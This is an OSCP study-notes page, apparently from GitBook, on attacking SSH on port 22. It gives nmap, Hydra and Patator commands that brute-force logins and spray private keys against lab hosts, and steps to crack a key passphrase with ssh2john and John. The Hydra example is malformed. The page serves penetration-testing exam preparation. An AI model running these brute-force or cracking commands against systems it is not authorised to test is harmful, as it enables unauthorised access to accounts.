✏️
OSCP
  • $WhoAmI?
  • Manual
  • NMAP
    • NSE Scripts
  • Steganography
  • Services Enumeration
    • Postgres Psql
    • SNMTP - 199
    • SSH - 22
    • TELNET - 23
    • RDP - 3389
    • DISTCCD - 3632
    • IMAP - 143
    • TFTP - UDP69
    • FTP - 21
    • HTTP 80/443
      • LFI to RCE
      • ShellShock
      • GIT
      • XXE, SQLI, CRLF, CSV,
      • CMS
      • Locations
        • Interested Linux Files
        • Logs
      • Command Injection
      • Remote File Inclusion (RFI)
      • File Upload Vulnerabilities
      • Remote Code Execution (RCE)
      • SQL Injection
      • Local File Inclusion (LFI)
        • LFI TO RCE
      • Web Enumeration
        • Patator BruteForce
        • ShellShock
        • Nikto
        • Anonymous Scanning
        • Fuzzers
        • DNS
    • SMB 139/445
      • SMB Exploit
      • SMB Enumerate
      • Send and Execute
      • Samba 2.2.x
    • RPC - 111
    • NFS
    • SNMP 161
    • SMTP 25
    • VNC - 5800
    • MYSQL - 3306
    • POP3 - 110
    • LDAP - 389
    • IRC 667
    • Java-RMI 1098/1099/1050
    • 1433 - MSSQL
  • Linux
    • Shells Linux
    • File Transfer
    • Linux Priv Esc
    • Fix Shell
    • Upload
    • Restricted Shell
  • Windows
    • File Transfer
    • Reverse Shell Cheatsheet
      • Full TTYs
      • Shells - Windows
      • MSFVENOM
    • Post Explotation
      • Nishang
      • Kernel Exploits
      • Service Exploits
      • Unquoted service paths
      • Mimikatz
    • BackDoors
    • EternalBlue MS17-010
    • Windows - Download and execute methods
    • Windows Priv Exc
    • Priv Esc Tools
    • ByPass UAC
      • Bypassing default UAC settings manually c++
      • EventVwr Bypass UAC Powershell
      • ByPass UAC Metasploit
      • Bypassing UAC with Kali’s bypassuac
      • Bypass UAC on Windows Vista
  • Password Attack
    • Intercepting Login Request
    • Windows Hashes
    • Linux Hashes
    • Wordlists
    • Brute Force Password Attacks & Cracking
    • Hashes
  • Network Pivoting Techniques
  • Buffer OverFlow
    • 6. Getting Shell
    • 5. Finding Bad Characters
    • 4. Overwrite EIP
    • 3. Finding The Offset
    • 2. Fuzzing
    • 1. Spiking
  • Downloads
  • Online Websites
  • Privilege Escalation History
  • Exploit
    • Unreal IRC
    • Sambacry
    • Shellshock
    • Padding Oracle Attack
Powered by GitBook
On this page
  • NMAP
  • Hydra
  • SSH combo list
  • Single user many passwords
  • SSH Private Key Spray
  • Find SSH Keyphrase with John - Crack SSH Private Key

Was this helpful?

  1. Services Enumeration

SSH - 22

NMAP

ls /usr/share/nmap/scripts/ | grep SSH

nmap –script ssh-brute –script-args=userdb=/root/HTB/hosts/shocker/user.lst,passdb=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt,brute.emptypass=True -d -v -sV -p 2222 10.10.10.56

Hydra

hydra -l rabakuku -P 192.168.1.1 ssh

SSH combo list 

patator ssh_login host=FILE0 user=COMBO10 password=COMBO11 0=./ssh-open.nmap 1=./combo-creds.txt

Single user many passwords 

patator ssh_login host=10.10.10.56 port=2222 –timeout 30 –threads=20 user=root password=FILE0 0=/root/oscp/lab-net2019/passwords.txt -x ignore:mesg=’Authentication failed.’

SSH Private Key Spray 

patator ssh_login keyfile=rsakey.cfg host=FILE0 user=bob 0=/root/oscp/lab-net2019/ssh-open.nmap –max-retries 1 –timeout 10

#spray keyfile against 1 host and try many users
patator ssh_login keyfile=./f1fb2162a02f0f7c40c210e6167f05ca-16858 host=10.31.1.133 user=FILE0 0=./users.lst –max-retries 3 –timeout 100

Find SSH Keyphrase with John - Crack SSH Private Key

First we’ll need to convert the ssh key using ssh2john with this command. Crack ssh.

python ssh2john.py SecretKey > SecretKey.hash
#After give it to john…
sudo john SecretKey.hash -wordlist=INSERTWORDLIST!
PreviousSNMTP - 199NextTELNET - 23

Last updated 4 years ago

Was this helpful?